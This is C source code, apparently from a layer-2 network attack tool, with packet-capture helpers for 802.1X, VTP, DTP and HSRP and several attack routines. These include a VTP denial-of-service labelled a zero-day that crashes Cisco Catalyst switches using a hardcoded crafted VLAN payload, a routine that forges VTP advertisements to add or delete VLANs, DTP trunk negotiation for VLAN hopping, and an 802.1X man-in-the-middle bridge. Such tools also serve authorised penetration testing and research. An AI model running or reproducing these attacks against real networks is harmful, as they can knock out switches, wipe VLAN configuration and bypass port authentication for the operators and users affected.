int8_t
dot1x_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header)
{
struct dot1x_data *dot1x_data;
struct pcap_data pcap_aux;
u_int8_t *packet, got_802_1x_pkt = 0;
u_int16_t *cursor;
dlist_t *p;
struct interface_data *iface_data;
dot1x_data = data;
if ((packet = calloc(1, SNAPLEN)) == NULL)
return -1;
if (iface) {
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
if (!p)
return -1;
iface_data = (struct interface_data *) dlist_data(p);
}
else
iface_data = NULL;
while (!got_802_1x_pkt && !(*stop))
{
interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_DOT1X, NO_TIMEOUT);
if (*stop)
{
free(packet);
return -1;
}
cursor = (u_int16_t *)(packet + 12);
pcap_aux.header = header;
pcap_aux.packet = packet;
if (!dot1x_load_values((struct pcap_data *)&pcap_aux, dot1x_data))
got_802_1x_pkt = 1;
} /* While got */
free(packet);
return 0;
}
int8_t
vtp_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header)
{
struct vtp_data *vtp_data;
struct pcap_data pcap_aux;
u_int8_t *packet, *cursor, got_vtp_packet = 0;
dlist_t *p;
struct interface_data *iface_data;
vtp_data = data;
if ((packet = calloc(1, SNAPLEN)) == NULL)
return -1;
if (iface) {
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
if (!p)
return -1;
iface_data = (struct interface_data *) dlist_data(p);
} else {
iface_data = NULL;
}
while (!got_vtp_packet && !(*stop))
{
interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_VTP, NO_TIMEOUT);
if (*stop)
{
free(packet);
return -1;
}
cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H);
pcap_aux.header = header;
pcap_aux.packet = packet;
if (!vtp_load_values((struct pcap_data *)&pcap_aux, vtp_data))
got_vtp_packet = 1;
} /* While got */
free(packet);
return 0;
}
int8_t dtp_learn_packet( struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header )
{
struct dtp_data *dtp_data = (struct dtp_data *)data;
struct interface_data *iface_data = NULL ;
struct pcap_data pcap_aux;
u_int8_t *packet, got_dtp_packet = 0;
dlist_t *p;
int8_t ret = -1 ;
if ( iface)
{
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
if ( !p )
return -1;
iface_data = (struct interface_data *) dlist_data(p);
}
packet = (u_int8_t *)calloc( 1, SNAPLEN );
if ( packet )
{
while ( !got_dtp_packet && !(*stop) )
{
interfaces_get_packet( attacks->used_ints, iface_data, stop, header, packet, PROTO_DTP, NO_TIMEOUT );
if ( !(*stop) )
{
pcap_aux.header = header;
pcap_aux.packet = packet;
if ( !dtp_load_values( (struct pcap_data *)&pcap_aux, dtp_data ) )
{
ret = 0 ;
got_dtp_packet = 1;
}
}
}
free(packet);
}
return ret ;
}
int8_t hsrp_learn_packet( struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header,
struct pcap_data *pcap_aux)
{
struct hsrp_data *hsrp_data = (struct hsrp_data *)data;
struct interface_data *iface_data = NULL ;
u_int8_t got_hsrp_packet = 0;
u_int8_t *packet;
dlist_t *p;
int8_t ret = -1 ;
if ( iface )
{
p = dlist_search( attacks->used_ints->list, attacks->used_ints->cmp, iface );
if ( !p )
return -1;
iface_data = (struct interface_data *) dlist_data(p);
}
packet = calloc( 1, SNAPLEN );
if ( packet )
{
while ( !got_hsrp_packet && !(*stop) )
{
interfaces_get_packet( attacks->used_ints, iface_data, stop, header, packet, PROTO_HSRP, NO_TIMEOUT );
if ( !(*stop) )
{
pcap_aux->header = header;
pcap_aux->packet = packet;
if ( !hsrp_load_values( pcap_aux, hsrp_data ) )
{
got_hsrp_packet = 1;
ret = 0 ;
}
}
}
free(packet);
}
return ret;
}
/*
* Zero day crashing Catalyst!!
*/
void
vtp_th_dos_crash(void *arg)
{
struct attacks *attacks=NULL;
struct vtp_data *vtp_data, vtp_data_learned;
struct pcap_pkthdr header;
struct pcap_data pcap_aux;
struct libnet_802_3_hdr *ether;
struct timeval now;
u_int8_t *packet=NULL, *cursor;
sigset_t mask;
/* Cisco vlans for crashing */
u_int8_t vlan_cisco[]={ 0x75, 0x00, 0x01, 0x07, 0x20, 0x00, 0x02, 0x0c,
0x03, 0xea, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8a,
0x66, 0x64, 0x64, 0x69, 0x2d, 0x64, 0x65, 0x66,
0x61, 0x75, 0x6c, 0x74, 0x01, 0x01, 0x00, 0x00,
0x04, 0x01, 0x00, 0x00, 0x28, 0x00, 0x03, 0x12,
0x03, 0xeb, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8b,
0x74, 0x6f, 0x6b, 0x65, 0x6e, 0x2d, 0x72, 0x69,
0x6e, 0x67, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75,
0x6c, 0x74, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,
0x04, 0x01, 0x00, 0x00, 0x24, 0x00, 0x04, 0x0f,
0x03, 0xec, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8c,
0x66, 0x64, 0x64, 0x69, 0x6e, 0x65, 0x74, 0x2d,
0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00,
0x02, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x01,
0x24, 0x00, 0x05, 0x0d, 0x03, 0xed, 0x05, 0xdc,
0x00, 0x01, 0x8a, 0x8d, 0x74, 0x72, 0x6e, 0x65,
0x74, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c,
0x74, 0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00,
0x03, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xf1, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0c, 0x20 };
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("vtp_th_dos_del_all pthread_sigmask()",errno);
vtp_th_dos_crash_exit(attacks);
}
attacks = arg;
vtp_data = attacks->data;
gettimeofday(&now, NULL);
header.ts.tv_sec = now.tv_sec;
header.ts.tv_usec = now.tv_usec;
if ((packet = calloc(1, SNAPLEN)) == NULL)
vtp_th_dos_crash_exit(attacks);
while (!attacks->attack_th.stop)
{
memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data));
interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet,
PROTO_VTP, NO_TIMEOUT);
if (attacks->attack_th.stop)
break;
cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H);
ether = (struct libnet_802_3_hdr *) packet;
if (!memcmp(vtp_data->mac_source,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
pcap_aux.header = &header;
pcap_aux.packet = packet;
if (vtp_load_values(&pcap_aux, &vtp_data_learned) < 0)
continue;
if ((vtp_data_learned.code != VTP_SUMM_ADVERT)
&& (vtp_data_learned.code != VTP_SUBSET_ADVERT) )
continue;
if (vtp_generate_md5( NULL,
vtp_data->updater,
(vtp_data_learned.revision+1),
vtp_data_learned.domain,
vtp_data_learned.dom_len,
vlan_cisco,
sizeof(vlan_cisco),
vtp_data->md5,
vtp_data_learned.version) < 0)
break;
vtp_data->code = VTP_SUMM_ADVERT;
vtp_data->followers = 1;
if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE)
{
vtp_data->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_data->domain,vtp_data_learned.domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_data->dom_len = vtp_data_learned.dom_len;
memcpy(vtp_data->domain,vtp_data_learned.domain,vtp_data_learned.dom_len);
}
vtp_data->revision = vtp_data_learned.revision+1;
usleep(200000);
if (vtp_send(attacks)< 0)
break;
usleep(200000);
vtp_data->code = VTP_SUBSET_ADVERT;
vtp_data->seq = 1;
vtp_data->vlan_info = vlan_cisco;
vtp_data->vlans_len = sizeof(vlan_cisco);
vtp_send(attacks);
break;
}
free(packet);
vtp_th_dos_crash_exit(attacks);
}
void
vtp_modify_vlan(u_int8_t op, struct attacks *attacks)
{
struct vtp_data *vtp_data, vtp_data_learned;
struct pcap_pkthdr header;
struct pcap_data pcap_aux;
struct libnet_802_3_hdr *ether;
struct attack_param *param=NULL;
struct timeval now;
u_int8_t *packet=NULL, *cursor=NULL;
char *vlan_name = NULL;
u_int16_t *vlan=NULL;
vtp_data = attacks->data;
param = attacks->params;
vlan = (u_int16_t *)param[VTP_PARAM_VLAN_ID].value;
if (op == VTP_VLAN_ADD)
vlan_name = (char *)param[VTP_PARAM_VLAN_NAME].value;
gettimeofday(&now, NULL);
header.ts.tv_sec = now.tv_sec;
header.ts.tv_usec = now.tv_usec;
if ((packet = calloc(1, SNAPLEN)) == NULL)
return;
while (!attacks->attack_th.stop)
{
memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data));
interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet,
PROTO_VTP, NO_TIMEOUT);
if (attacks->attack_th.stop)
break;
cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H);
ether = (struct libnet_802_3_hdr *) packet;
if (!memcmp(vtp_data->mac_source,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
pcap_aux.header = &header;
pcap_aux.packet = packet;
if (vtp_load_values(&pcap_aux, &vtp_data_learned) < 0)
continue;
if ((vtp_data_learned.code != VTP_SUMM_ADVERT)
&& (vtp_data_learned.code != VTP_SUBSET_ADVERT) )
continue;
if (vtp_data_learned.code == VTP_SUMM_ADVERT)
{
if ( !vtp_data_learned.followers)
{
write_log(0,"vtp_attack: No followers. Sending Request...\n");
vtp_data->version = vtp_data_learned.version;
vtp_data->code = VTP_REQUEST;
if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE)
{
vtp_data->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_data->domain,vtp_data_learned.domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_data->dom_len = vtp_data_learned.dom_len;
memcpy(vtp_data->domain,vtp_data_learned.domain,vtp_data_learned.dom_len);
}
vtp_data->start_val = 1;
if (vtp_send(attacks)< 0)
break;
}
continue;
}
write_log(0," Domain %s\n",vtp_data_learned.domain);
write_log(0," Dom_len %d\n",vtp_data_learned.dom_len);
write_log(0," Revision %X\n",(vtp_data_learned.revision+1));
write_log(0," Vlan_len %d\n",vtp_data_learned.vlans_len);
if (op == VTP_VLAN_DEL)
{
if (vtp_del_vlan(*vlan, vtp_data_learned.vlan_info,
&vtp_data_learned.vlans_len) < 0)
{
write_log(0," vtp_del_attack: VLAN %d not existent. Aborting...\n",*vlan);
break;
}
}
else /* Add vlan...*/
{
if (vtp_add_vlan(*vlan, vlan_name, &vtp_data_learned.vlan_info,
&vtp_data_learned.vlans_len) < 0)
{
write_log(0," vtp_add_attack: VLAN %d existent. Aborting...\n",*vlan);
break;
}
}
if (vtp_generate_md5( NULL,
vtp_data->updater,
(vtp_data_learned.revision+1),
vtp_data_learned.domain,
vtp_data_learned.dom_len,
vtp_data_learned.vlan_info,
vtp_data_learned.vlans_len,
vtp_data->md5,
vtp_data_learned.version) < 0)
break;
vtp_data->version = vtp_data_learned.version;
vtp_data->code = VTP_SUMM_ADVERT;
vtp_data->followers = 1;
if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE)
{
vtp_data->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_data->domain,vtp_data_learned.domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_data->dom_len = vtp_data_learned.dom_len;
memcpy(vtp_data->domain,vtp_data_learned.domain,vtp_data_learned.dom_len);
}
vtp_data->revision = vtp_data_learned.revision+1;
if (vtp_send(attacks)< 0)
break;
thread_usleep(200000);
vtp_data->version = vtp_data_learned.version;
vtp_data->code = VTP_SUBSET_ADVERT;
vtp_data->seq = 1;
vtp_data->vlans_len = vtp_data_learned.vlans_len;
vtp_data->vlan_info = vtp_data_learned.vlan_info;
write_log(0," Vlan_len after = %d\n",vtp_data_learned.vlans_len);
vtp_send(attacks);
break;
}
free(packet);
}
void dtp_th_nondos_do_trunk( void *arg )
{
struct attacks *attacks = (struct attacks *)arg;
struct dtp_data *dtp_data, dtp_data_learned;
struct pcap_pkthdr header;
struct pcap_data pcap_aux;
struct libnet_802_3_hdr *ether;
struct timeval now;
u_int8_t *packet;
sigset_t mask;
pthread_mutex_lock(&attacks->attack_th.finished);
pthread_detach(pthread_self());
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("dtp_nondos_do_trunk pthread_sigmask()",errno);
dtp_th_nondos_do_trunk_exit(attacks);
}
dtp_data = attacks->data;
gettimeofday(&now,NULL);
header.ts.tv_sec = now.tv_sec;
header.ts.tv_usec = now.tv_usec;
/* If you want to test the NULL domain just set the defaults DTP packet values */
/* and comment the following lines. (and recompile)*/
/* From here...
if (dtp_learn_packet(ALL_INTS,&attacks->attack_th.stop, &dtp_data_learned, &header) < 0)
dtp_th_nondos_do_trunk_exit(attacks);
memcpy(dtp_data->mac_dest, dtp_data_learned.mac_dest,6);
memcpy(dtp_data->domain,(void *)dtp_data_learned.domain, dtp_data_learned.dom_len);
dtp_data->version = dtp_data_learned.version;
dtp_data->dom_len = dtp_data_learned.dom_len;
dtp_data->status = dtp_data_learned.status;
dtp_data->type = dtp_data_learned.type;
... to here. */
packet = (u_int8_t *)calloc( 1, SNAPLEN );
if ( ! packet )
dtp_th_nondos_do_trunk_exit(attacks);
dtp_send(attacks); thread_usleep(999999);
dtp_send(attacks); thread_usleep(999999);
if ( !attacks->attack_th.stop )
{
dtp_send(attacks);
if ( ! thread_create( &attacks->helper_th, &dtp_send_negotiate, attacks ) )
{
while ( ! attacks->attack_th.stop )
{
interfaces_get_packet( attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet, PROTO_DTP, NO_TIMEOUT );
if ( ! attacks->attack_th.stop )
{
ether = (struct libnet_802_3_hdr *) packet;
if (!memcmp(dtp_data->mac_source,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
pcap_aux.header = &header;
pcap_aux.packet = packet;
if ( dtp_load_values( &pcap_aux, &dtp_data_learned ) < 0)
continue;
switch( dtp_data_learned.status & 0xF0 )
{
case DTP_TRUNK:
dtp_data->status = (DTP_TRUNK | DTP_DESIRABLE);
break;
case DTP_ACCESS:
dtp_data->status = (DTP_ACCESS | DTP_DESIRABLE);
break;
}
}
}
}
else
write_log( 0, "dtp_th_nondos_do_trunk thread_create error\n" );
}
free(packet);
dtp_th_nondos_do_trunk_exit(attacks);
}
/*
* 802.1X MitM simple attack.
* You'll need 2 network interfaces, 1 attached
* to the supplicant device and the other attached
* to the authenticator device.
*/
void dot1x_th_mitm( void *arg )
{
struct attacks *attacks = (struct attacks *)arg;
struct attack_param *param = (struct attack_param *)attacks->params;
sigset_t mask;
struct pcap_pkthdr header;
struct libnet_802_3_hdr *ether;
struct timeval now;
struct dot1x_mitm_ifaces mitm_ifaces;
struct interface_data *iface;
dlist_t *p;
u_int8_t *packet;
pthread_mutex_lock(&attacks->attack_th.finished);
pthread_detach(pthread_self());
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("dot1x_th_mitm pthread_sigmask()",errno);
dot1x_th_mitm_exit(attacks);
}
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_AUTH].value);
mitm_ifaces.auth = (struct interface_data *) dlist_data(p);
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_SUPP].value);
mitm_ifaces.supp = (struct interface_data *) dlist_data(p);
if (!mitm_ifaces.auth || !mitm_ifaces.supp)
{
if (!mitm_ifaces.auth)
write_log(0,"Ooops!! Interface %s not existent!!\n",param[DOT1X_MITM_IFACE_AUTH].value);
else
write_log(0,"Ooops!! Interface %s not existent!!\n",param[DOT1X_MITM_IFACE_SUPP].value);
write_log(0," Have you enabled the interface? Sure?...\n");
dot1x_th_mitm_exit(attacks);
}
gettimeofday(&now,NULL);
header.ts.tv_sec = now.tv_sec;
header.ts.tv_usec = now.tv_usec;
if ((packet = calloc(1, SNAPLEN)) == NULL)
dot1x_th_mitm_exit(attacks);
/* Get Authenticator MAC address... */
interfaces_get_packet(attacks->used_ints, mitm_ifaces.auth, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT );
if (attacks->attack_th.stop)
{
free(packet);
dot1x_th_mitm_exit(attacks);
}
ether = (struct libnet_802_3_hdr *) packet;
write_log(0, " Authenticator MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
ether->_802_3_shost[0], ether->_802_3_shost[1], ether->_802_3_shost[2],
ether->_802_3_shost[3], ether->_802_3_shost[4], ether->_802_3_shost[5]);
memcpy((void *)mitm_ifaces.mac_auth,(void *)ether->_802_3_shost,6);
/* Get supplicant MAC address */
interfaces_get_packet( attacks->used_ints, mitm_ifaces.supp, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT );
if (attacks->attack_th.stop)
{
free(packet);
dot1x_th_mitm_exit(attacks);
}
ether = (struct libnet_802_3_hdr *) packet;
write_log(0, " Supplicant MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
ether->_802_3_shost[0], ether->_802_3_shost[1], ether->_802_3_shost[2],
ether->_802_3_shost[3], ether->_802_3_shost[4], ether->_802_3_shost[5]);
memcpy((void *)mitm_ifaces.mac_supp,(void *)ether->_802_3_shost,6);
/* Ok... Now start the funny bridging side... */
while( !attacks->attack_th.stop )
{
iface = interfaces_get_packet(attacks->used_ints,
NULL,
&attacks->attack_th.stop,
&header,
packet,
PROTO_DOT1X,
NO_TIMEOUT);
if (attacks->attack_th.stop)
break;
ether = (struct libnet_802_3_hdr *) packet;
/* Authenticator interface? */
if (iface->libnet_handler == mitm_ifaces.auth->libnet_handler)
{
if (!memcmp(mitm_ifaces.mac_supp,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
dot1x_send_raw(mitm_ifaces.supp, (packet+LIBNET_802_3_H), (header.len-LIBNET_802_3_H), mitm_ifaces.mac_auth, mitm_ifaces.mac_supp);
continue;
}
/* Supplicant interface? */
if (iface->libnet_handler == mitm_ifaces.supp->libnet_handler)
{
if (!memcmp(mitm_ifaces.mac_auth,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
dot1x_send_raw(mitm_ifaces.auth, (packet+LIBNET_802_3_H), (header.len-LIBNET_802_3_H), mitm_ifaces.mac_supp, mitm_ifaces.mac_auth);
continue;
}
}
free(packet);
dot1x_th_mitm_exit(attacks);
}